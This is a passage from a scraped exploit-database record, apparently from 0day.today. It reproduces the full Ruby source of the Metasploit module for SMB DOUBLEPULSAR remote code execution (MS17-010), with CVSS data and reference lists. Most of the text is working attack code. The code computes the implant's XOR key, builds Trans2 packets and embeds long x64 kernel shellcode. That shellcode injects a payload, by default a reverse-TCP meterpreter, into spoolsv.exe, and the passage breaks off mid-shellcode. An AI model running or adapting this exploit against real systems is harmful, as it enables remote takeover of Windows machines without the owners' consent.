\"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-12] #"}, "lastseen": "2021-09-11T22:17:48", "differentElements": ["sourceData"], "edition": 14}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "7def4a7faae3df927132434d83088054", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-12T22:14:55", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-11T22:17:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T22:17:48", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n 